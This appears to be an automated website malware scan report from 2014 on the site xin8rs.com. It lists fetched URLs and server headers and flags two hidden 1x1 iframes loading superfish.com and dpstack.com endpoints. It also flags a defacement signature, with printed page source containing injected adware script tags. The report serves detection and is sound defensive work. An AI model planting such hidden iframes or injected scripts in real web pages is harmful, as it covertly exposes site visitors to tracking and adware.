Scanned pages/files
Request | Server response | Status |
http://xin8rs.com/ | HTTP/1.1 200 OK Date: Wed, 17 Dec 2014 07:03:27 GMT Accept-Ranges: bytes ETag: "d28d8f137b19d01:2fec" Server: Microsoft-IIS/6.0 Content-Length: 8098 Content-Location: http://xin8rs.com/Default.htm Content-Type: text/html Last-Modified: Tue, 16 Dec 2014 21:55:59 GMT X-Powered-By: ASP.NET | clean |
http://xin8rs.com/default.htm | 200 OK Content-Length: 8098 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 style: hidden src: http://hrt.dpstack.com/dealdo/event-report?type=heart_bit&partner=inff&channel=inffphp01&uid=752164945563781788&cb=2012_10_22&hid=v24300293762245519811052012111113481714&suspended=false&firstusedate=1352671752897&clv=1352369221216
<iframe src="http://hrt.dpstack.com/dealdo/event-report?type=heart_bit&partner=inff&channel=inffphp01&uid=752164945563781788&cb=2012_10_22&hid=v24300293762245519811052012111113481714&suspended=false&firstusedate=1352671752897&clv=1352369221216" style="width: 1px; height: 1px; visibility: hidden; position: fixed;">
Hidden iFrame found. size: 1x1 style: hidden src: http://www.superfish.com/ws/userdata.jsp?dlsource=hhvzmikw&userid=ntbcntbc&ver=2014.10.2.16.6
<iframe src="http://www.superfish.com/ws/userdata.jsp?dlsource=hhvzmikw&userid=ntbcntbc&ver=2014.10.2.16.6" style="border: currentcolor; left: -100px; top: -100px; width: 1px; height: 1px; visibility: hidden; position: absolute; z-index: -10;">
Deface/Content modification. The following signature was found: HaCkeD By Hawleri_hacker
<!-- saved from url=(0047)http://www.crm.getweb.hu/htdocs/maintenance.php -->
<!-- Generated by F12 developer tools. This might not be an accurate representation of the original source file --> <html dir="rtl"><head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>HaCkeD By Hawleri_hacker</title> <script src="http://nps.noproblemppc.com/npsb/inj.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E" type="text/javascript" async=""></script><script src="http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=190214299922000000&partnername=Information" type="text/javascript"></script><script src="http://www.superfish.com/ws/sf_preloader.js ...[8818 bytes skipped]...
http://nps.noproblemppc.com/npsb/inj.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E | 200 OK Content-Length: 15396 Content-Type: application/x-javascript | clean |
http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=190214299922000000&partnername=Information | 200 OK Content-Length: 13169 Content-Type: text/html | clean |
http://www.superfish.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 07:03:28 GMT Pragma: no-cache Location: http://wwws.superfish.com/test404page.js Server: nginx Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Access-Control-Allow-Origin: * CF-Cache-Status: MISS CF-RAY: 19a142d3b1540291-SJC ClientCountry: LT Set-Cookie: __cfduid=d4058d5bf651026598e07bad51ac762181418799808; expires=Thu, 17-Dec-15 07:03:28 GMT; path=/; domain=.superfish.com; HttpOnly X-Pingback: http://wwws.superfish.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://wwws.superfish.com/test404page.js | 404 Not Found Content-Length: 28770 Content-Type: text/html | clean |
http://wwws.superfish.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.cycle.all.min.js?ver=4.0.1 | 200 OK Content-Length: 31614 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.flexslider.js?ver=1.0 | 200 OK Content-Length: 41062 Content-Type: application/x-javascript | clean |
http://www.superfish.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 07:03:32 GMT Pragma: no-cache Location: http://wwws.superfish.com/www.googleadservices.com/pagead/conversion.js/ Server: nginx Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Access-Control-Allow-Origin: * CF-RAY: 19a142edd9320291-SJC ClientCountry: LT Set-Cookie: __cfduid=d79ad8c6526e6bf8d0276801a7c05c9561418799812; expires=Thu, 17-Dec-15 07:03:32 GMT; path=/; domain=.superfish.com; HttpOnly X-Pingback: http://wwws.superfish.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://wwws.superfish.com/www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 28799 Content-Type: text/html | clean |
http://wwws.superfish.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 07:03:34 GMT Pragma: no-cache Location: http://wwws.superfish.com/www.googleadservices.com/pagead/conversion.js/ Server: cloudflare-nginx Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT CF-RAY: 19a142f428a205cf-WAW Set-Cookie: __cfduid=dfe55ac5fc16f6a22c72a578737aad37d1418799813; expires=Thu, 17-Dec-15 07:03:33 GMT; path=/; domain=.superfish.com; HttpOnly X-Pingback: http://wwws.superfish.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://wwws.superfish.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.2 | 200 OK Content-Length: 9658 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.sticky.js?ver=1.0 | 200 OK Content-Length: 4627 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.smooth-scroll.js?ver=1.0 | 200 OK Content-Length: 1434 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/contact-form.js?ver=1.0 | 200 OK Content-Length: 1385 Content-Type: application/x-javascript | clean |
http://wwws.superfish.com/wp-content/themes/SCRN/js/jquery.easing.1.3.js?ver=1.0 | 200 OK Content-Length: 8301 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xin8rs.com
Result:
HTTP/1.1 200 OK
Date: Wed, 17 Dec 2014 07:03:27 GMT
Accept-Ranges: bytes
ETag: "d28d8f137b19d01:2fec"
Server: Microsoft-IIS/6.0
Content-Length: 8098
Content-Location: http://xin8rs.com/Default.htm
Content-Type: text/html
Last-Modified: Tue, 16 Dec 2014 21:55:59 GMT
X-Powered-By: ASP.NET
...8098 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xin8rs.com
Referer: http://www.google.com/search?q=xin8rs.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xin8rs.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xin8rs.com/
Result: xin8rs.com is not infected or malware details are not published yet.